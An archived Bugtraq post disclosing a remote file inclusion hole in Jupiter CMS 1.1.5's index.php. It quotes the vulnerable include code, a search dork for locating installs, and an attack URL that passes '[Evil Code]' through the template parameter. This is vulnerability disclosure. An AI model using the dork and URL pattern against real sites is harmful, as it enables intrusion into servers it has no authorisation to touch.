Bugtraq mailing list archives

Jupiter CMS 1.1.5 index.php Remote File Include

From: D3nGeR () Gmail CoM
Date: 25 Aug 2006 22:50:11 -0000

##################################################################################
#Jupiter CMS 1.1.5 index.php Remote File Include
# 
#F0und by : D3nGeR
#E-mail : D3nGeR () Gmail CoM 
##################################################################################
#                                   the code
#$template = "default";
#   include "templates/$template/id.php";
#   $db->updateRow("config",array('value' => 'default'),"variable = 'template'");
################################################################################## 
#                                   The Expl
# 
# dork : powered by Jupiter CMS
#www.sitename.com/path/index.php?template=[Evil Code]
# 
##################################################################################

Current thread:

Jupiter CMS 1.1.5 index.php Remote File Include D3nGeR (Aug 26)
- Re: Jupiter CMS 1.1.5 index.php Remote File Include Carsten Eilers (Aug 30)